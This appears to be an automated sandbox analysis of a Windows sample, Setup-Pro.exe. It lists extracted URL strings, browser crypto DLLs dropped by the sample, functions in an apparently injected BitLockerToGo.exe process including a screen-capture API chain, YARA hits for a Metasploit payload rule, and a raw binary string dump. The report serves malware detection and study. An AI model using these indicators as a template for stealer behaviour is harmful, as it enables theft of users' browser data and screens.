                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: Setup-Pro.exe, program.js.0.drString found in binary or memory: http://json-schema.org/draft-07/schema
                    Source: program.js.0.drString found in binary or memory: http://json-schema.org/draft-07/schema#
                    Source: Setup-Pro.exe, program.js.0.drString found in binary or memory: http://json-schema.org/schema
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: BitLockerToGo.exe, 00000002.00000002.1858384056.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1847494467.000000001D530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Setup-Pro.exe, program.js.0.drString found in binary or memory: https://aws.amazon.com
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Setup-Pro.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii
                    Source: Setup-Pro.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii.git
                    Source: Setup-Pro.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii/issues
                    Source: program.js.0.drString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
                    Source: FIJECAEHJJJKJKFIDGCB.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
                    Source: program.js.0.drString found in binary or memory: https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#
                    Source: HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://support.mozilla.org
                    Source: HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: BitLockerToGo.exe, 00000002.00000003.1654990713.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, BKJEGDGI.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmp, FIJECAEHJJJKJKFIDGCB.2.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://www.mozilla.org
                    Source: HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                    Source: HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                    Source: HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: BitLockerToGo.exe, 00000002.00000003.1797055526.000000002F8B3000.00000004.00000020.00020000.00000000.sdmp, HJEHIJEBKEBFBFHIIDHIIDGIJE.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03019010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_03019010

                    System Summary

                    barindex
                    Source: 00000000.00000002.1586077537.0000000002900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: 00000000.00000003.1507758122.0000000002900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: 00000000.00000003.1507758122.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: 00000000.00000002.1586077537.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: Process Memory Space: Setup-Pro.exe PID: 7596, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCDB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6CCDB700
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCDB8C0 rand_s,NtQueryVirtualMemory,2_2_6CCDB8C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCDB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6CCDB910
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC7F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6CC7F280
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC735A02_2_6CC735A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC864C02_2_6CC864C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC9D4D02_2_6CC9D4D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC7D4E02_2_6CC7D4E0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB6CF02_2_6CCB6CF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC86C802_2_6CC86C80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCD34A02_2_6CCD34A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCDC4A02_2_6CCDC4A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC854402_2_6CC85440
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCE545C2_2_6CCE545C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCEAC002_2_6CCEAC00
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB5C102_2_6CCB5C10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCC2C102_2_6CCC2C10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCE542B2_2_6CCE542B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB0DD02_2_6CCB0DD0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCD85F02_2_6CCD85F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC8FD002_2_6CC8FD00
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCA05122_2_6CCA0512
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC9ED102_2_6CC9ED10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCE76E32_2_6CCE76E3
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC7BEF02_2_6CC7BEF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC8FEF02_2_6CC8FEF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCDE6802_2_6CCDE680
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC95E902_2_6CC95E90
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCD4EA02_2_6CCD4EA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCC2E4E2_2_6CCC2E4E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC946402_2_6CC94640
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC99E502_2_6CC99E50
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB3E502_2_6CCB3E50
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCE6E632_2_6CCE6E63
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC7C6702_2_6CC7C670
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCC56002_2_6CCC5600
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB7E102_2_6CCB7E10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCD9E302_2_6CCD9E30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC7DFE02_2_6CC7DFE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCA6FF02_2_6CCA6FF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCC77A02_2_6CCC77A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC89F002_2_6CC89F00
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB77102_2_6CCB7710
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCE50C72_2_6CCE50C7
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC9C0E02_2_6CC9C0E0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB58E02_2_6CCB58E0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCA60A02_2_6CCA60A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC988502_2_6CC98850
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC9D8502_2_6CC9D850
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCBF0702_2_6CCBF070
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC878102_2_6CC87810
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCBB8202_2_6CCBB820
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCC48202_2_6CCC4820
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB51902_2_6CCB5190
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCD29902_2_6CCD2990
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC7C9A02_2_6CC7C9A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCAD9B02_2_6CCAD9B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC9A9402_2_6CC9A940
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC8D9602_2_6CC8D960
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCCB9702_2_6CCCB970
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCEB1702_2_6CCEB170
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB8AC02_2_6CCB8AC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC91AF02_2_6CC91AF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCBE2F02_2_6CCBE2F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCEBA902_2_6CCEBA90
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC722A02_2_6CC722A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCA4AA02_2_6CCA4AA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC8CAB02_2_6CC8CAB0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCE2AB02_2_6CCE2AB0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCB9A602_2_6CCB9A60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCE53C82_2_6CCE53C8
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC7F3802_2_6CC7F380
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC753402_2_6CC75340
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC8C3702_2_6CC8C370
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CCBD3202_2_6CCBD320
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6CCACBE8 appears 134 times
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6CCB94D0 appears 90 times
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 030045C0 appears 316 times
                    Source: Setup-Pro.exe, 00000000.00000000.1399629904.00000000022E0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Setup-Pro.exe
                    Source: Setup-Pro.exe, 00000000.00000003.1507758122.000000000299A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Setup-Pro.exe
                    Source: Setup-Pro.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.1586077537.0000000002900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: 00000000.00000003.1507758122.0000000002900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: 00000000.00000003.1507758122.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: 00000000.00000002.1586077537.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: Process Memory Space: Setup-Pro.exe PID: 7596, type: MEMORYSTRMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: Setup-Pro.exeBinary string: bindm in unexpected GOOSruntime: mp.lockedInt = runqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlockreflect.StructOf: field reflect.MapIter.SetValuereflect.Value.SetComplexreflect.Value.UnsafeAddrapplication/octet-streamRequest Entity Too Largeunexpected mantissa baseunexpected exponent baseRat.Scan: invalid syntaxx509: malformed validityjson: unsupported type: 116415321826934814453125582076609134674072265625node has invalid kind %vcannot repeat map key %qconstructs.MetadataEntryaws-cdk-lib.AssetStagingaws-cdk-lib.CfnConditionaws-cdk-lib.CfnParameteracceptTermsAndConditionsaws-cdk-lib.CfnPublisheraws-cdk-lib.FeatureFlagsaws-cdk-lib.PhysicalNameaws-cdk-lib.StringConcataws-cdk-lib.Tokenizationaws-cdk-lib.AssetOptionsaws-cdk-lib.CfnHookPropsaws-cdk-lib.CfnJsonPropsAcceptTermsAndConditionsaws-cdk-lib.CfnRulePropsaws-cdk-lib.DockerVolumeaws-cdk-lib.IAnyProduceraws-cdk-lib.IInspectableaws-cdk-lib.ITokenMapperassumeRolePolicyDocumentopenIdConnectProviderArnaws-cdk-lib.aws_iam.Roleaws-cdk-lib.aws_iam.UserAssumeRolePolicyDocumentOpenIdConnectProviderArnaws-cdk-lib.aws_kms.IKeybucketRegionalDomainNamenotificationsHandlerRolereplicationConfigurationattrPolicyStatusIsPublicstorageLensConfigurationOBJECT_RESTORE_COMPLETEDBucketRegionalDomainNameNotificationsHandlerRoleReplicationConfigurationAttrPolicyStatusIsPublicStorageLensConfigurationstatisticsConfigurationsStatisticsConfigurationsallowUnassociatedTargetstaskInvocationParametersAWS_EC2_SECURITYGROUP_IDAllowUnassociatedTargetsTaskInvocationParametersAllocateAndInitializeSidBuildSecurityDescriptorWAssignProcessToJobObjectGenerateConsoleCtrlEventGetMaximumProcessorCountGetNamedPipeHandleStateWSetConsoleCursorPositionSetDefaultDllDirectoriesNtQuerySystemInformationSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDeviceGetWindowThreadProcessIdzlib: invalid dictionaryexec: Stdout already setexec: Stderr already setinvalid pattern syntax: duplicate %TAG directiveread handler must be setexceeded max depth of %dwhile scanning an anchoraddress string too shortresource length too longunpacking Question.Classidna: disallowed rune %Uindent can only be space%s%s is unsupported typeinvalid instance id: %#vsha2-256-trunc254-paddedno protocol with code %dbyte slice too short: %dbindnode Finish TODO: %TMap__String__UnionMemberMap__HexString__TypeNameStructRepresentation_Mapmust start with a letterAWS_CLOUDFORMATION_STACKflate: maxBits too largestreamSafe was not resetType.Indirect argument 1SliceType.Len argument 1SliceType.Cap argument 